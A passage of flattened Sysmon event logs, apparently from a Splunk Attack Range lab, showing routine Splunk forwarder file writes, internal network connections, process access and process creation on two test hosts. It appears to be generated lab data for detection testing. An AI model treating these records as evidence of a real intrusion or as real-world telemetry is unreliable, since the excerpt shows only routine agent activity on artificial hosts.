Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB5238748A8ECA0155E554AB6B34B738,SHA256=7415836B24483CA193F38C7668A886BD653560D0D77940E6C4E923229BCB5E29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:36.430{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAB0E288007D5F89D78C2863D902052B,SHA256=3E5ACB1119AAE8D7FC86ED82511F6303F19AAA5C0DC79319FAAF3AE2B81551E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:34.636{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53295-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:37.524{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F436691BD085A0396A7302EC900F2715,SHA256=EEA014C8E0A72F0AD97CD388AF37B0EE01807F7FB2DF8F99F4BDA88C87426532,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:38.539{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=547B70F5BEE131065DA96B72872CBDFD,SHA256=2DD50A6D095773489F5CA7531B6C3675DECB89C574C19E45E4FDEF82FF185574,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:38.051{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D92F7119CB81832C3F9277A9C9E6A45F,SHA256=D3B9EEC7541ABD77DBBAB60E362E3A473092516BB676B9B72EE836E9666774E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:39.711{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=076474F60A4F8E0C6ACDCB1C768F58C7,SHA256=7A9F79B675A56218B04323EE3179484C78F0143B8FA12F2D1FFC146607E90FDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:39.598{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:39.114{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CEC77D95C88B487DABE2F83A19829AB,SHA256=9022DA7631AA88EA7D8B8656A714F1A61FCBCE799BC0A2124B6535A486BC19AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:40.930{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DABAC60F6FF4B3A5E41D36D4EC808E50,SHA256=CCAABF2CF94A8E17DAF19EF50DD46FF6F5C7CD1A7BAB2578DDCE5E36445E6267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:40.176{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F5FA66E780808388FFC9F92D8F05A62,SHA256=30267124B869AB9585308411C6A7E8D01B48024A80F2415FA26DCB57E412E0EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:37.619{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51231-false10.0.1.12-8000- 23542300x8000000000000000215026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:41.961{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=013EB92530F8F3A8E14C3AE094017EF7,SHA256=EEC9D8CCED6D16DBDC94AFF4AE98BEF99BDAEFC45BE6F06C9A7D85686DCB6E43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:41.223{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F0CF8F5820EC7CE01D44715F4780D49,SHA256=1952BEAC22F70725A52D8187188B11134F33093A132E9DE4C270BAE318AD5679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:42.992{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E163A0FD2306E8AB591D1DC6B6CF0CAA,SHA256=4998C0C99A80CC3C92ED89AC0328288D1D2FBB320EF303A91D7FBD1C2811155B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:40.636{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53297-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:42.255{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47A5B2C16014E8F5ADF5C884E92F2003,SHA256=801D60F8D760E55DA882F45044DB9F50E2C2BC3B576A3853AB75F1E365169F63,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:39.011{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53296-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000215028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:43.992{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C699275D26067422AA367A445F8DFCB,SHA256=B02420DDC1A68F9857FBF8CCE7643CF312613A35A25FD297500CCC746EDF6E25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:43.302{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=605132C99E8FBD048F0A6E442185EDC8,SHA256=757559EFEADE32EA5AF843B7DB3528C2A4531315C926766E828B7CB47D990CC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:44.317{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5259D538891B01DADCB250B95E9ED3E4,SHA256=D94C05AB4CC66AB5D68F9A3F252865B1A4189409C01720468078E409BF8473DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:44.544{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-125MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:45.427{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E1502C690134549A0FEC8B7BEC54CA6,SHA256=E683AF6B6341D6814FE5463BE3565B68AE5B1083F40368990EDC62527908700A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.798{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F69-6216-1904-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0F69-6216-1904-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.782{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F69-6216-1904-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.783{4F8D34B0-0F69-6216-1904-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000215045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:42.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51232-false10.0.1.12-8000- 23542300x8000000000000000215044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.550{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-126MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F69-6216-1804-000000003902}4004C:\Program 